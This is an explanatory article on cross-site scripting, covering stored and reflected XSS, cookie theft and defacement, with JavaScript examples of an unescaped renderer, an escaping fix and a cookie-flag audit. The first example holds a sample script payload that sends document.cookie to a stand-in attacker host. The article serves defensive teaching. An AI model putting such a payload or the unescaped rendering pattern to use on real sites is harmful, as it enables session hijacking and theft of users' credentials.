Cross Site Scripting (XSS)

Cross site scripting

One of the most common weaknesses in websites is cross-site scripting, also known as XSS. It is a vulnerability that lets an attacker inject their own script into a legitimate website, so that the victim's browser executes the attacker's code with the trust and privileges of that site. Unlike a phishing page, the victim really is on the genuine site; the attacker's code has been smuggled into it because the site copies untrusted input into its pages without escaping it.

The attacker does this with the intention of capturing the victim's details, hijacking their session, or luring them to a further site that attacks their browser. The attack is triggered when the victim views a page that carries the malicious script. That page may be one where the attacker has stored the script, for example in a comment or profile field (stored XSS), or it may be a link the attacker has sent to the victim that carries the script in a parameter the site echoes back into the page (reflected XSS).

A common delivery method is a link in an email dressed up as an account confirmation message, like the one below. The victim believes the email is from their provider and clicks the link; the link does point at the genuine site, but the script it carries runs in the victim's browser and hands their details to the attacker.
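The following is an added example, not code from the original article, showing the reflected case described above in the smallest possible form. It assumes a hypothetical search page that echoes a `q` query parameter back into its HTML. The vulnerable renderer concatenates the parameter straight into the markup; the hardened renderer HTML-escapes it first, so the same payload is shown as harmless text. The attacker input is constructed for the example.

```javascript
// Added example (not from the original article): a reflected-XSS sink and its fix.
// Assumed scenario: a search page echoes the `q` query parameter into the HTML.

// Vulnerable: untrusted input is concatenated straight into the markup, so any
// markup in `q` becomes part of the page and runs in the site's origin.
function renderSearchVulnerable(q) {
  return `<p>Results for: ${q}</p>`;
}

// HTML-escape the five characters that can break out of an HTML text or
// attribute context. The browser then renders the payload as literal text.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Hardened: escape before interpolating.
function renderSearchSafe(q) {
  return `<p>Results for: ${escapeHtml(q)}</p>`;
}

// Crude check used here only to show the difference between the two renderers:
// did a <script> tag make it into the output unescaped?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker input: the value that would be placed in a link such as
// https://example.test/search?q=... (hypothetical host) and emailed to the victim.
// It ships the victim's cookies to attacker.test (also hypothetical).
const PAYLOAD =
  '<script>new Image().src="https://attacker.test/c?"+document.cookie</script>';

console.log('vulnerable:', renderSearchVulnerable(PAYLOAD));
console.log('hardened:  ', renderSearchSafe(PAYLOAD));
```

The escaping shown is correct only for HTML text and quoted attribute values. A parameter that lands inside a URL, a `<script>` block or an inline event handler needs the encoding for that context instead, which is why templating engines that escape by default and a Content-Security-Policy that forbids inline script are the usual defence rather than hand-rolled replacement.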


Consequences of an attack

XSS code can be crafted to lift a variety of sensitive data, including anything presented on the page where the injected script runs. The most serious risk, however, is the theft of the user's authentication credentials.

Many sites store authentication or session tokens in a browser cookie. Unless the cookie is marked HttpOnly, script running in the page can read it through document.cookie and send it to a server controlled by the attacker. With that cookie in hand, the attacker may be able to access the same website as the victim user, bypassing the login step entirely.
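To turn the paragraph above into a concrete check, here is an added example (not from the original article) that parses Set-Cookie headers and reports which cookies an injected script could read, i.e. those without HttpOnly, together with a small audit of a session cookie's flags. The header values are constructed for the example and the cookie names are hypothetical.

```javascript
// Added example (not from the original article): which cookies could an
// injected script read? document.cookie never exposes cookies set with the
// HttpOnly attribute, so marking the session cookie HttpOnly blunts the theft
// described above.

// Parse one Set-Cookie header value into { name, value, attrs }.
// Attribute names are lower-cased; flag attributes map to true.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [nameValue, ...attrParts] = parts;
  const eq = nameValue.indexOf('=');
  const name = eq === -1 ? nameValue : nameValue.slice(0, eq);
  const value = eq === -1 ? '' : nameValue.slice(eq + 1);
  const attrs = {};
  for (const a of attrParts) {
    const i = a.indexOf('=');
    const key = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : a.slice(i + 1);
  }
  return { name, value, attrs };
}

// Names of cookies an XSS payload could read via document.cookie:
// everything the server set without HttpOnly.
function scriptReadableCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !c.attrs.httponly)
    .map((c) => c.name);
}

// Flag the attributes a session cookie should carry but does not.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.attrs.httponly) findings.push('missing HttpOnly: readable by injected script');
  if (!c.attrs.secure) findings.push('missing Secure: sent over plain HTTP');
  if (!c.attrs.samesite) findings.push('missing SameSite: sent on cross-site requests');
  return findings;
}

// Constructed response headers (hypothetical cookie names) for the example.
const WEAK = 'sessionid=abc123; Path=/';
const HARDENED = 'sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax';
const PREFS = 'theme=dark; Path=/';

console.log('readable with weak session cookie:    ', scriptReadableCookies([WEAK, PREFS]));
console.log('readable with hardened session cookie:', scriptReadableCookies([HARDENED, PREFS]));
console.log('audit of weak cookie:', auditSessionCookie(WEAK));
```

HttpOnly stops the cookie from being copied out, which is what defeats the "reuse the stolen cookie from the attacker's machine" scenario. It does not stop the injected script from making requests from inside the victim's browser, where the cookie is attached automatically, so actions the script performs on the victim's behalf remain possible until the XSS itself is fixed.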

Even if the compromised site does not hold highly sensitive content such as email or finances, an attacker may obtain personal details that can be leveraged against a more sensitive account, such as the user's webmail.

Because the injected script runs inside the page, it can also alter the content presented to the visitor. One nasty trick is to change the destination of an existing link (or to add a new link that the visitor is urgently told to click), baiting them into visiting a site fully controlled by the attacker and engineered to launch a more serious attack.

Alternatively, an attacker might aim an XSS attack at the site owner rather than the visitor. The same trick of altering output can be used to vandalise content: imagine a news site where the XSS attack defaces headlines and undermines the credibility of the site.